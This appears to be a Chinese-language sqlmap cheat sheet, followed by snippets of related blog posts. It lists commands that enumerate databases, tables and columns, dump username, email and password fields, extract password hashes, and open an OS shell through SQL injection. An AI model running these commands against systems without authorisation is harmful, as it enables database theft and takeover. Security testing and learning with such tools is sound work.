sqlmap -u
sqlmap -u --dbs
sqlmap -u --current-db
sqlmap -u -d vhost48330 --tables
『vhost48330』 為指定資料庫名稱
sqlmap -u -d vhost48330 -t admin --columns
『admin』 為指定表名稱
sqlmap -u -d vhost48330 -t admin -c ac,id,password --dump
『ac,id,password』 為指定欄位名稱
1.列資料庫資訊:–dbs
2.web當前使用的資料庫–current-db
3.web資料庫使用賬戶–current-user
4.列出sqlserver所有使用者 --users
5.資料庫賬戶與密碼 --passwords
6.指定庫名列出所有表 -d database --tables
-d:指定資料庫名稱
7.指定庫名錶名列出所有字段 -d antian365-t admin --columns
-t:指定要列出欄位的表
8.指定庫名錶名字段dump出指定字段
-d secbang_com -t admin -c id,password ,username --dump
-d antian365 -t userb -c"email,username,userpassword" --dump
可加雙引號,也可不加雙引號。
9.匯出多少條資料
-d tourdata -t userb -c"email,username,userpassword" --start 1 --stop 10 --dump
引數:–start:指定開始的行
–stop:指定結束的行
此條命令的含義為:匯出資料庫tourdata中的表userb中的字段(email,username,userpassword)中的第1到第10行的資料內容。
–tamper[指令碼] 使用指令碼爆破
–safe-url : 防止多次訪問錯誤url被伺服器拒接訪問
–os-cmd或 --os-shell 資料庫mof提權
-delay 延時多少秒進行下一步
-batch 預設選項yes
–identify -waf 檢查防火牆型別
–thread 10 設定程序(最大為10)
–level 注入等級(1-3)
-r 載入檔案中的http請求
sqlmap 基本使用
原文 遇到sql注入就sqlmap一把梭,有一說一,這個工具確實好用,不過還是要了解sql注入原理,不然只能做個指令碼小子,簡單了解一下 介紹之前,先簡單了解一下sqlmap的引數,可以利用 sqlmap h 查詢,這裡簡單介紹幾個常用的 u url r 檔案 dbs 獲取庫名 d 庫名 table...
sqlmap 基本使用規則
sqlmap是安全測試工具,通常用於對已知的http介面進行sql注入測試,一旦注入成功,可以獲取到後台包括資料庫表 使用者資訊 資料內容等多種敏感資訊,對web漏洞防範有重要意義。經常使用的語法是 python sqlmap.py u url 也就是 u後面跟 get方法直接在 後面跟?post方...
sqlmap基本使用說明
h v usage python sqlmap options options h,help 顯示基本的幫助資訊 hh 顯示高階幫助資訊 version 顯示sqlmap版本資訊 v verbose 輸出資訊的詳細級別 0 6 預設為1 target 至少要有乙個target引數來確定攻擊目標 u ...